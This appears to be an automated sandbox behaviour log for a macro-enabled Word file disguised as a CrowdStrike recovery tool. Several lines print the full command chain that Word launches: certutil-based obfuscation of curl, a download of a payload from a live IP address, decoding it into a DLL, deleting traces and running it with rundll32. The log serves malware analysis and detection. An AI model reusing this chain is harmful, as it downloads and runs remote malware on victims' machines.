Source: C:\Windows\System32\certutil.exe	Console Write: ................................O.u.t.p.u.t. .L.e.n.g.t.h. .=. .7.3.0.1.0.8.............#........d..............H.(.....,.................(.....	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Console Write: ..................................(.....(.P.....(........................{..............#........d..............H.(.......................(.....	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Console Write: ................................ .(.....(.P.....(........................{..............#........3).....................b.........x.......(.....	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Console Write: ..................................(.....(.P.....(........................{..............#........3)...............(.......................(.....	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Console Write: ................................I.n.p.u.t. .L.e.n.g.t.h. .=. .7.3.0.1.0.8...............#.......(dF.....................*.......q(2w............	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Console Write: ........................................(.P.....(........................\|..............#.......(dF.............................................	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Console Write: ................................O.u.t.p.u.t. .L.e.n.g.t.h. .=. .5.3.0.9.4.4.............#.......(dF.....................,.......................	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Console Write: ........................................(.P.....(.......................'\|..............#.......(dF.............................................	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Console Write: ................................p.......(.P.....(.......................+\|..............#........3).....................b.........7.............	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Console Write: ........................................(.P.....(......................./\|..............#........3).............................................	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Console Write: .................Q.w............ .......(.P.....(.......................v~..............#.......(d..............................q(2w............	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Console Write: .................Q.w....................(.P.....(.......................z~..............#.......(d..............................................	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Console Write: ................x.#.............@.......(.P.....(.......................~~..............#.........#.....................n... .r.e.t.u.r.........	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Console Write: ................x.#.....................(.P.....(........................~..............#.........#......................... .r.................	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Console Write: .................Q.w....................(.P.....(........................~..............#.......p.$.....................j.......................	Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\xcopy.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain

Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm

ReversingLabs: Detection: 26%

Source: curl.exe	String found in binary or memory: This is not the full help, this menu is stripped into categories. Use "--help category" to get an overview of all categories. For all options use the manual or "--help all".
Source: curl.exe	String found in binary or memory: This is not the full help, this menu is stripped into categories. Use "--help category" to get an overview of all categories. For all options use the manual or "--help all".
Source: curl.exe	String found in binary or memory: curl: try 'curl --help' for more information
Source: curl.exe	String found in binary or memory: curl: try 'curl --help' for more information
Source: curl.exe	String found in binary or memory: curl: try 'curl --help' for more information
Source: curl.exe	String found in binary or memory: curl: try 'curl --help' for more information
Source: curl.exe	String found in binary or memory: This is not the full help, this menu is stripped into categories.Use "--help category" to get an overview of all categories.For all options use the manual or "--help all".
Source: curl.exe	String found in binary or memory: This is not the full help, this menu is stripped into categories.Use "--help category" to get an overview of all categories.For all options use the manual or "--help all".
Source: curl.exe	String found in binary or memory: This is not the full help, this menu is stripped into categories. Use "--help category" to get an overview of all categories. For all options use the manual or "--help all".
Source: curl.exe	String found in binary or memory: This is not the full help, this menu is stripped into categories. Use "--help category" to get an overview of all categories. For all options use the manual or "--help all".
Source: curl.exe	String found in binary or memory: curl: try 'curl --help' for more information
Source: curl.exe	String found in binary or memory: curl: try 'curl --help' for more information
Source: curl.exe	String found in binary or memory: curl: try 'curl --help' for more information
Source: curl.exe	String found in binary or memory: curl: try 'curl --help' for more information
Source: curl.exe	String found in binary or memory: This is not the full help, this menu is stripped into categories.Use "--help category" to get an overview of all categories.For all options use the manual or "--help all".
Source: curl.exe	String found in binary or memory: This is not the full help, this menu is stripped into categories.Use "--help category" to get an overview of all categories.For all options use the manual or "--help all".

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp & certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe & C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\curl.txt & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\mscorsvc.txt & START " " rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain & exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\xcopy.exe xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\certutil.exe certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\certutil.exe certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\certutil.exe certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain
Source: unknown	Process created: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1352 --field-trial-handle=1336,i,10461182675022210413,3013190625299692533,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown	Process created: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" "https://go.microsoft.com/fwlink/?linkid=2280386"
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2208 --field-trial-handle=1336,i,10461182675022210413,3013190625299692533,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp & certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe & C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\curl.txt & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\mscorsvc.txt & START " " rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain & exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\xcopy.exe xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\certutil.exe certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\certutil.exe certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\certutil.exe certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp & certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe & C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\curl.txt & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\mscorsvc.txt & START " " rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain & exit	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\xcopy.exe xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\certutil.exe certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\certutil.exe certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\certutil.exe certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1352 --field-trial-handle=1336,i,10461182675022210413,3013190625299692533,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2208 --field-trial-handle=1336,i,10461182675022210413,3013190625299692533,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp & certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe & C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\curl.txt & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\mscorsvc.txt & START " " rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain & exit	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\xcopy.exe xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\certutil.exe certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\certutil.exe certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\certutil.exe certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain

Source: C:\Windows\System32\cmd.exe	Section loaded: winbrand.dll	Jump to behavior
Source: C:\Windows\System32\xcopy.exe	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\System32\xcopy.exe	Section loaded: ifsutil.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: certcli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: cryptui.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: ntdsapi.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: certcli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: cryptui.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: ntdsapi.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: certcli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: cryptui.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: ntdsapi.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: winbrand.dll
Source: C:\Windows\System32\xcopy.exe	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\System32\xcopy.exe	Section loaded: ifsutil.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: certcli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: cryptui.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: ntdsapi.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: certcli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: cryptui.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: ntdsapi.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: certcli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: cryptui.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: ntdsapi.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: dwmapi.dll	Jump to behavior

Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.LNK.0.dr

LNK file: ..\..\..\..\..\Desktop\New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm

Source: C:\Windows\System32\rundll32.exe	Automated click: OK
Source: C:\Windows\System32\rundll32.exe	Automated click: OK

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm	Initial sample: OLE zip file path = word/media/image1.jpg
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm	Initial sample: OLE zip file path = word/media/image2.jpg
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm	Initial sample: OLE zip file path = word/media/image3.jpg
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm	Initial sample: OLE zip file path = docProps/custom.xml
Source: ~WRC0001.tmp.16.dr	Initial sample: OLE zip file path = word/media/image1.jpg
Source: ~WRC0001.tmp.16.dr	Initial sample: OLE zip file path = word/media/image2.jpg
Source: ~WRC0001.tmp.16.dr	Initial sample: OLE zip file path = word/media/image3.jpg
Source: ~WRC0001.tmp.16.dr	Initial sample: OLE zip file path = docProps/custom.xml
Source: ~WRC0000.tmp.16.dr	Initial sample: OLE zip file path = word/glossary/settings.xml
Source: ~WRC0000.tmp.16.dr	Initial sample: OLE zip file path = word/glossary/_rels/document.xml.rels
Source: ~WRC0000.tmp.16.dr	Initial sample: OLE zip file path = word/glossary/document.xml
Source: ~WRC0000.tmp.16.dr	Initial sample: OLE zip file path = word/glossary/fontTable.xml
Source: ~WRC0000.tmp.16.dr	Initial sample: OLE zip file path = word/glossary/webSettings.xml
Source: ~WRC0000.tmp.16.dr	Initial sample: OLE zip file path = word/glossary/stylesWithEffects.xml
Source: ~WRC0000.tmp.16.dr	Initial sample: OLE zip file path = word/glossary/styles.xml

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Directory created: C:\Program Files\Google	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Directory created: C:\Program Files\Google\GoogleUpdater	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Directory created: C:\Program Files\chrome_BITS_3236_441263539	Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

